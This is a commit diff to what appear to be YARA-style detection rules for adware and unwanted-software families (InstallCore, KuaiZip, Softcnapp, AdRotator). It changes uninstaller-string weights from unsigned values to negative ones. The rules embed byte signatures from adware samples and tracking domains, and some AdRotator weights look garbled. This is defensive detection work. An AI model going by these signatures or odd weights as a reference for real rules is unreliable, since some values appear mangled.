fix error condition
This commit is contained in:
roadwy
parent
c65741fd7e
commit
4285531c38
|
|
@ -82,10 +82,10 @@ rule _#PUA_Block_InstallCore_7{
|
|||
$a_80_2 = {53 4b 49 50 5f 4f 46 46 45 52 } //SKIP_OFFER 1
|
||||
$a_80_3 = {43 48 4f 4f 53 45 5f 44 45 46 41 55 4c 54 5f 4f 46 46 45 52 } //CHOOSE_DEFAULT_OFFER 1
|
||||
$a_80_4 = {6f 70 65 72 61 70 72 65 66 73 2e 69 6e 69 } //operaprefs.ini 1
|
||||
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436) >=5
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100) >=5
|
||||
|
||||
}
|
||||
rule _#PUA_Block_InstallCore_8{
|
||||
|
|
|
|||
|
|
@ -205,10 +205,10 @@ rule _#PUA_Block_KuaiZip_15{
|
|||
$a_00_5 = {6e 65 77 73 2e 74 6f 75 74 69 61 6f 62 61 73 68 69 2e 63 6f 6d } //1 news.toutiaobashi.com
|
||||
$a_00_6 = {33 36 30 63 68 72 6f 6d 65 2e 65 78 65 } //1 360chrome.exe
|
||||
$a_00_7 = {6f 70 65 72 61 2e 65 78 65 } //1 opera.exe
|
||||
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_80_8 & 1)*65436+(#a_80_9 & 1)*65436) >=8
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_80_8 & 1)*-100+(#a_80_9 & 1)*-100) >=8
|
||||
|
||||
}
|
||||
rule _#PUA_Block_KuaiZip_16{
|
||||
|
|
@ -237,10 +237,10 @@ rule _#PUA_Block_KuaiZip_17{
|
|||
$a_80_2 = {61 70 69 2e 6b 70 7a 69 70 2e 63 6f 6d } //api.kpzip.com 1
|
||||
$a_80_3 = {64 3a 5c 73 76 6e 72 6f 6f 74 5c 6b 75 61 69 7a 69 70 5c 74 72 75 6e 6b 5c 62 69 6e 5c 52 65 6c 65 61 73 65 5c 58 38 36 5c 4b 7a 55 70 64 61 74 65 41 67 65 6e 63 79 2e 70 64 62 } //d:\svnroot\kuaizip\trunk\bin\Release\X86\KzUpdateAgency.pdb 1
|
||||
$a_80_4 = {6b 7a 75 70 64 61 74 65 61 67 65 6e 63 79 } //kzupdateagency 1
|
||||
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436) >=5
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100) >=5
|
||||
|
||||
}
|
||||
rule _#PUA_Block_KuaiZip_18{
|
||||
|
|
|
|||
|
|
@ -33,9 +33,9 @@ rule _#PUA_Block_Softcnapp_3{
|
|||
$a_80_0 = {63 68 69 6e 61 76 69 70 73 6f 66 74 2e 63 6f 6d } //chinavipsoft.com 1
|
||||
$a_80_1 = {55 73 65 56 65 73 74 69 67 65 2e 69 6e 69 } //UseVestige.ini 1
|
||||
$a_80_2 = {57 61 6e 4e 65 6e 67 5a 69 70 2e 69 6e 69 } //WanNengZip.ini 1
|
||||
$a_80_3 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin 65526
|
||||
$a_80_3 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin -10
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*65526) >=3
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*-10) >=3
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_4{
|
||||
|
|
@ -46,9 +46,9 @@ rule _#PUA_Block_Softcnapp_4{
|
|||
$a_02_0 = {65 6c 65 70 68 61 6e 74 70 64 66 90 02 0f 2e 79 65 62 61 6e 6b 65 6a 69 2e 63 6e 90 00 } //1
|
||||
$a_80_1 = {45 68 50 44 46 } //EhPDF 1
|
||||
$a_80_2 = {50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 45 6c 65 70 68 61 6e 74 } //Program Files\Elephant 1
|
||||
$a_80_3 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65531
|
||||
$a_80_3 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -5
|
||||
condition:
|
||||
((#a_02_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*65531) >=3
|
||||
((#a_02_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*-5) >=3
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_5{
|
||||
|
|
@ -115,9 +115,9 @@ rule _#PUA_Block_Softcnapp_9{
|
|||
$a_80_1 = {7a 79 63 75 6c 74 75 72 61 2e 63 6f 6d } //zycultura.com 1
|
||||
$a_80_2 = {58 73 50 69 63 49 6e 66 6f 2e 69 6e 69 } //XsPicInfo.ini 1
|
||||
$a_80_3 = {55 73 65 56 65 73 74 69 67 65 2e 69 6e 69 } //UseVestige.ini 1
|
||||
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65531
|
||||
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -5
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65531) >=4
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-5) >=4
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_10{
|
||||
|
|
@ -129,10 +129,10 @@ rule _#PUA_Block_Softcnapp_10{
|
|||
$a_80_1 = {74 6a 69 2e 7a 68 69 6c 69 6e 67 73 68 69 64 61 69 2e 63 6f 6d } //tji.zhilingshidai.com 2
|
||||
$a_80_2 = {64 6f 77 6e 2e 7a 68 69 6c 69 6e 67 73 68 69 64 61 69 2e 63 6f 6d } //down.zhilingshidai.com 1
|
||||
$a_80_3 = {55 73 65 49 6e 66 6f 2e 69 6e 69 } //UseInfo.ini 1
|
||||
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65436+(#a_80_5 & 1)*65436) >=5
|
||||
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-100+(#a_80_5 & 1)*-100) >=5
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_11{
|
||||
|
|
@ -144,9 +144,9 @@ rule _#PUA_Block_Softcnapp_11{
|
|||
$a_80_1 = {43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 4d 47 57 61 6c 6c 70 61 70 65 72 5c } //C:\Program Files\MGWallpaper\ 1
|
||||
$a_00_2 = {73 6f 66 74 74 6a 2e 70 61 6e 73 68 69 78 6b 2e 63 6f 6d } //1 softtj.panshixk.com
|
||||
$a_80_3 = {4d 67 57 61 6c 6c 2e 65 78 65 } //MgWall.exe 1
|
||||
$a_80_4 = {50 65 72 73 69 73 74 42 61 72 5f 4f 6e 43 6f 6e 74 69 6e 75 65 55 6e 69 6e 73 74 } //PersistBar_OnContinueUninst 65531
|
||||
$a_80_4 = {50 65 72 73 69 73 74 42 61 72 5f 4f 6e 43 6f 6e 74 69 6e 75 65 55 6e 69 6e 73 74 } //PersistBar_OnContinueUninst -5
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_00_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65531) >=4
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_00_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-5) >=4
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_12{
|
||||
|
|
@ -172,10 +172,10 @@ rule _#PUA_Block_Softcnapp_13{
|
|||
$a_80_1 = {43 3a 5c 4e 6f 53 68 6f 77 48 74 74 70 43 6f 6e 74 65 2e 6e 74 6c } //C:\NoShowHttpConte.ntl 1
|
||||
$a_80_2 = {4d 69 6e 69 50 61 67 65 2e 65 78 65 } //MiniPage.exe 1
|
||||
$a_80_3 = {6f 74 74 2e 78 73 66 61 79 61 2e 63 6f 6d } //ott.xsfaya.com 1
|
||||
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_4 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_5 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*65436+(#a_80_5 & 1)*65436) >=4
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*-100+(#a_80_5 & 1)*-100) >=4
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_14{
|
||||
|
|
@ -188,11 +188,11 @@ rule _#PUA_Block_Softcnapp_14{
|
|||
$a_80_2 = {58 73 50 69 63 56 69 65 77 } //XsPicView 1
|
||||
$a_02_3 = {58 00 73 00 50 00 69 00 63 00 90 02 0f 2e 00 65 00 78 00 65 00 90 00 } //1
|
||||
$a_02_4 = {58 73 50 69 63 90 02 0f 2e 65 78 65 90 00 } //1
|
||||
$a_80_5 = {58 73 50 69 63 55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //XsPicUninstall.exe 65436
|
||||
$a_80_6 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_7 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_5 = {58 73 50 69 63 55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //XsPicUninstall.exe -100
|
||||
$a_80_6 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_7 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_02_3 & 1)*1+(#a_02_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436+(#a_80_7 & 1)*65436) >=5
|
||||
((#a_80_0 & 1)*2+(#a_80_1 & 1)*2+(#a_80_2 & 1)*1+(#a_02_3 & 1)*1+(#a_02_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100+(#a_80_7 & 1)*-100) >=5
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_15{
|
||||
|
|
@ -265,10 +265,10 @@ rule _#PUA_Block_Softcnapp_19{
|
|||
$a_80_4 = {4d 69 6e 69 44 75 6d 70 57 72 69 74 65 44 75 6d 70 } //MiniDumpWriteDump 1
|
||||
$a_80_5 = {6f 70 74 2e 76 6b 75 70 64 66 2e 63 6f 6d } //opt.vkupdf.com 1
|
||||
$a_80_6 = {42 65 73 74 5a 69 70 2e 65 78 65 } //BestZip.exe 1
|
||||
$a_80_7 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_8 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_7 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_8 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*65436+(#a_80_8 & 1)*65436) >=7
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*-100+(#a_80_8 & 1)*-100) >=7
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_20{
|
||||
|
|
@ -286,9 +286,9 @@ rule _#PUA_Block_Softcnapp_20{
|
|||
$a_80_7 = {4a 4b 43 6f 76 79 62 61 77 62 79 2e 69 6e 69 } //JKCovybawby.ini 1
|
||||
$a_80_8 = {4a 69 6b 65 50 44 46 43 6f 6e 76 65 72 74 65 72 2e 69 6e 69 } //JikePDFConverter.ini 1
|
||||
$a_80_9 = {5a 48 50 44 46 49 6e 66 6f 2e 69 6e 69 } //ZHPDFInfo.ini 1
|
||||
$a_80_10 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin 65531
|
||||
$a_80_10 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin -5
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*65531) >=3
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*-5) >=3
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_21{
|
||||
|
|
@ -307,9 +307,9 @@ rule _#PUA_Block_Softcnapp_21{
|
|||
$a_80_8 = {46 6c 69 72 74 63 6b 79 6f 75 73 } //Flirtckyous 1
|
||||
$a_80_9 = {4d 75 6f 74 65 72 69 6e 65 2e 69 6e 69 } //Muoterine.ini 1
|
||||
$a_80_10 = {59 61 72 6e 72 6f 75 6e 64 } //Yarnround 1
|
||||
$a_80_11 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin 65531
|
||||
$a_80_11 = {55 6e 69 6e 73 74 46 69 6e 69 73 68 42 67 53 6b 69 6e } //UninstFinishBgSkin -5
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_00_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*65531) >=3
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_00_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*-5) >=3
|
||||
|
||||
}
|
||||
rule _#PUA_Block_Softcnapp_22{
|
||||
|
|
|
|||
|
|
@ -525,7 +525,7 @@ rule Adware_Win32_AdRotator_35{
|
|||
$a_00_39 = {26 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d 00 6f 00 64 00 2f 00 75 00 6e 00 6f 00 74 00 69 00 66 00 79 00 2e 00 70 00 68 00 70 00 3f 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d } //115
|
||||
$a_00_41 = {6b 00 64 00 6d 00 5f 00 64 00 62 00 32 00 2e 00 70 00 68 00 70 00 3f 00 6e 00 65 00 74 00 3d 00 7b 00 31 00 7d 00 26 00 76 00 3d 00 7b 00 32 00 7d 00 01 00 16 01 7b 00 30 00 7d 00 20 00 7b 00 31 00 7d 00 5f 00 7b 00 32 00 7d 00 01 00 38 01 54 00 65 00 6d 00 70 00 6f 00 72 00 61 00 72 00 79 00 20 00 49 00 } //47
|
||||
$a_00_42 = {65 00 72 00 6e 00 65 00 74 00 20 00 46 00 69 00 6c 00 65 00 73 00 00 00 6c 00 6f 00 77 00 01 00 19 01 33 d8 8b 46 08 03 c2 66 89 5d 08 66 8b 5d 08 66 33 18 8b 06 4a 66 89 1c 01 01 00 18 01 33 d8 66 89 5d 08 8b 46 08 66 8b 5d 08 03 c2 66 33 18 8b 06 66 89 1c 48 01 00 1f 03 33 c3 88 45 ff 0f b6 45 ff 83 90 01 02 88 45 ff 8a 45 ff 32 01 8b 5e 90 01 } //110
|
||||
$a_1a_43 = {00 01 00 1e } //34817 ĀḀ
|
||||
$a_1a_43 = {00 01 00 1e } //-30719 ĀḀ
|
||||
$a_8b_44 = {08 88 54 24 08 0f b6 54 24 08 2b c8 8a 49 90 01 01 32 d1 8b 0e 88 14 08 90 00 01 00 12 01 8b 4b 10 66 8b 0c 01 66 33 4b 08 8b 53 0c 66 89 0c 10 01 00 14 01 eb 09 8b 4c 24 04 8a 09 30 08 40 3b 44 24 08 75 f1 c2 08 00 01 00 12 01 8a 4c 24 04 3b c2 74 0a 30 08 0f be 08 40 3b c2 75 f6 01 00 12 01 74 10 8a 4c 24 0c 30 08 0f be 08 40 3b 44 24 08 75 f4 01 00 0e 01 eb 06 30 08 0f be 08 40 3b 44 24 04 75 f4 01 00 13 01 8b 44 24 04 eb 04 80 00 8f 40 3b 44 24 08 75 f6 c2 08 00 01 00 1d 03 66 33 3c 02 ff 90 03 01 01 4d 6d 0c 8b 19 66 89 3c 1e 75 ee 66 8b 3c 02 66 33 38 90 00 01 00 20 01 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 73 } //13059
|
||||
$a_00_46 = {6d 00 69 00 6e 00 67 00 01 00 16 01 63 00 6c 00 69 00 63 00 6b 00 62 00 75 00 73 00 74 00 65 00 72 00 01 00 14 01 65 00 61 00 72 00 6e 00 66 00 6f 00 72 00 66 00 75 00 6e 00 01 00 1c 01 65 00 78 00 70 00 72 00 65 00 73 00 73 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 12 01 63 00 61 } //101
|
||||
$a_00_48 = {74 00 61 00 6e 00 01 00 14 01 68 00 6f 00 74 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 18 01 74 00 6f 00 70 00 67 00 65 00 61 00 72 00 6d 00 6f 00 6e 00 65 00 79 00 01 00 12 01 76 00 6f 00 67 00 75 00 65 00 63 00 61 00 73 00 68 00 01 00 10 01 62 00 72 00 69 00 6e 00 63 00 6f 00 6d 00 65 00 01 00 1c 01 79 } //116
|
||||
|
|
@ -539,7 +539,7 @@ rule Adware_Win32_AdRotator_35{
|
|||
$a_56_58 = {64 6e 6f 70 6f 70 70 6f 70 6f 70 6f 40 40 01 00 0f 01 2e 3f 41 56 4c 6f 65 70 77 6b 73 78 6d 40 40 01 00 0e 01 2e 3f 41 56 50 71 71 72 70 72 74 75 40 40 01 00 17 03 8b 54 24 04 8a 14 10 8b 4e 04 } //16174
|
||||
$a_40_59 = {f8 90 01 01 76 ed 90 00 } //5256
|
||||
condition:
|
||||
((#a_11_0 & 1)*30+(#a_67_1 & 1)*3840+(#a_64_2 & 1)*26465+(#a_1e_3 & 1)*30066+(#a_61_4 & 1)*4371+(#a_64_5 & 1)*29797+(#a_75_6 & 1)*24435+(#a_61_7 & 1)*27507+(#a_72_8 & 1)*26222+(#a_3f_9 & 1)*16703+(#a_01_10 & 1)*16485+(#a_40_11 & 1)*25956+(#a_43_12 & 1)*16703+(#a_6b_13 & 1)*17494+(#a_71_14 & 1)*16726+(#a_00_15 & 1)*100+(#a_00_17 & 1)*104+(#a_00_19 & 1)*121+(#a_00_20 & 1)*103+(#a_00_22 & 1)*102+(#a_73_23 & 1)*5120+(#a_00_25 & 1)*98+(#a_00_26 & 1)*101+(#a_00_28 & 1)*99+(#a_65_29 & 1)*18262+(#a_67_30 & 1)*24936+(#a_6f_31 & 1)*28532+(#a_2e_32 & 1)*3584+(#a_6b_33 & 1)*17494+(#a_71_34 & 1)*16726+(#a_00_35 & 1)*32+(#a_00_37 & 1)*118+(#a_00_39 & 1)*115+(#a_00_41 & 1)*47+(#a_00_42 & 1)*110+(#a_1a_43 & 1)*34817+(#a_8b_44 & 1)*13059+(#a_00_46 & 1)*101+(#a_00_48 & 1)*116+(#a_00_50 & 1)*114+(#a_00_51 & 1)*108+(#a_76_52 & 1)*6656+(#a_00_54 & 1)*108+(#a_00_55 & 1)*105+(#a_00_56 & 1)*278+(#a_70_57 & 1)*19286+(#a_56_58 & 1)*16174+(#a_40_59 & 1)*5256) >=32
|
||||
((#a_11_0 & 1)*30+(#a_67_1 & 1)*3840+(#a_64_2 & 1)*26465+(#a_1e_3 & 1)*30066+(#a_61_4 & 1)*4371+(#a_64_5 & 1)*29797+(#a_75_6 & 1)*24435+(#a_61_7 & 1)*27507+(#a_72_8 & 1)*26222+(#a_3f_9 & 1)*16703+(#a_01_10 & 1)*16485+(#a_40_11 & 1)*25956+(#a_43_12 & 1)*16703+(#a_6b_13 & 1)*17494+(#a_71_14 & 1)*16726+(#a_00_15 & 1)*100+(#a_00_17 & 1)*104+(#a_00_19 & 1)*121+(#a_00_20 & 1)*103+(#a_00_22 & 1)*102+(#a_73_23 & 1)*5120+(#a_00_25 & 1)*98+(#a_00_26 & 1)*101+(#a_00_28 & 1)*99+(#a_65_29 & 1)*18262+(#a_67_30 & 1)*24936+(#a_6f_31 & 1)*28532+(#a_2e_32 & 1)*3584+(#a_6b_33 & 1)*17494+(#a_71_34 & 1)*16726+(#a_00_35 & 1)*32+(#a_00_37 & 1)*118+(#a_00_39 & 1)*115+(#a_00_41 & 1)*47+(#a_00_42 & 1)*110+(#a_1a_43 & 1)*-30719+(#a_8b_44 & 1)*13059+(#a_00_46 & 1)*101+(#a_00_48 & 1)*116+(#a_00_50 & 1)*114+(#a_00_51 & 1)*108+(#a_76_52 & 1)*6656+(#a_00_54 & 1)*108+(#a_00_55 & 1)*105+(#a_00_56 & 1)*278+(#a_70_57 & 1)*19286+(#a_56_58 & 1)*16174+(#a_40_59 & 1)*5256) >=32
|
||||
|
||||
}
|
||||
rule Adware_Win32_AdRotator_36{
|
||||
|
|
@ -573,7 +573,7 @@ rule Adware_Win32_AdRotator_36{
|
|||
$a_00_32 = {26 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d 00 6f 00 64 00 2f 00 75 00 6e 00 6f 00 74 00 69 00 66 00 79 00 2e 00 70 00 68 00 70 00 3f 00 61 00 66 00 66 00 3d 00 7b 00 31 00 7d 00 26 00 68 00 77 00 3d 00 7b 00 32 00 7d 00 01 00 44 01 7b 00 30 00 7d 00 2f 00 6d } //115
|
||||
$a_00_34 = {6b 00 64 00 6d 00 5f 00 64 00 62 00 32 00 2e 00 70 00 68 00 70 00 3f 00 6e 00 65 00 74 00 3d 00 7b 00 31 00 7d 00 26 00 76 00 3d 00 7b 00 32 00 7d 00 01 00 16 01 7b 00 30 00 7d 00 20 00 7b 00 31 00 7d 00 5f 00 7b 00 32 00 7d 00 01 00 38 01 54 00 65 00 6d 00 70 00 6f 00 72 00 61 00 72 00 79 00 20 00 49 00 } //47
|
||||
$a_00_35 = {65 00 72 00 6e 00 65 00 74 00 20 00 46 00 69 00 6c 00 65 00 73 00 00 00 6c 00 6f 00 77 00 01 00 19 01 33 d8 8b 46 08 03 c2 66 89 5d 08 66 8b 5d 08 66 33 18 8b 06 4a 66 89 1c 01 01 00 18 01 33 d8 66 89 5d 08 8b 46 08 66 8b 5d 08 03 c2 66 33 18 8b 06 66 89 1c 48 01 00 1f 03 33 c3 88 45 ff 0f b6 45 ff 83 90 01 02 88 45 ff 8a 45 ff 32 01 8b 5e 90 01 } //110
|
||||
$a_1a_36 = {00 01 00 1e } //34817 ĀḀ
|
||||
$a_1a_36 = {00 01 00 1e } //-30719 ĀḀ
|
||||
$a_8b_37 = {08 88 54 24 08 0f b6 54 24 08 2b c8 8a 49 90 01 01 32 d1 8b 0e 88 14 08 90 00 01 00 12 01 8b 4b 10 66 8b 0c 01 66 33 4b 08 8b 53 0c 66 89 0c 10 01 00 14 01 eb 09 8b 4c 24 04 8a 09 30 08 40 3b 44 24 08 75 f1 c2 08 00 01 00 12 01 8a 4c 24 04 3b c2 74 0a 30 08 0f be 08 40 3b c2 75 f6 01 00 12 01 74 10 8a 4c 24 0c 30 08 0f be 08 40 3b 44 24 08 75 f4 01 00 0e 01 eb 06 30 08 0f be 08 40 3b 44 24 04 75 f4 01 00 13 01 8b 44 24 04 eb 04 80 00 8f 40 3b 44 24 08 75 f6 c2 08 00 01 00 1d 03 66 33 3c 02 ff 90 03 01 01 4d 6d 0c 8b 19 66 89 3c 1e 75 ee 66 8b 3c 02 66 33 38 90 00 01 00 20 01 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 73 } //13059
|
||||
$a_00_39 = {6d 00 69 00 6e 00 67 00 01 00 16 01 63 00 6c 00 69 00 63 00 6b 00 62 00 75 00 73 00 74 00 65 00 72 00 01 00 14 01 65 00 61 00 72 00 6e 00 66 00 6f 00 72 00 66 00 75 00 6e 00 01 00 1c 01 65 00 78 00 70 00 72 00 65 00 73 00 73 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 12 01 63 00 61 } //101
|
||||
$a_00_41 = {74 00 61 00 6e 00 01 00 14 01 68 00 6f 00 74 00 72 00 65 00 76 00 65 00 6e 00 75 00 65 00 01 00 18 01 74 00 6f 00 70 00 67 00 65 00 61 00 72 00 6d 00 6f 00 6e 00 65 00 79 00 01 00 12 01 76 00 6f 00 67 00 75 00 65 00 63 00 61 00 73 00 68 00 01 00 10 01 62 00 72 00 69 00 6e 00 63 00 6f 00 6d 00 65 00 01 00 1c 01 79 } //116
|
||||
|
|
@ -591,10 +591,10 @@ rule Adware_Win32_AdRotator_36{
|
|||
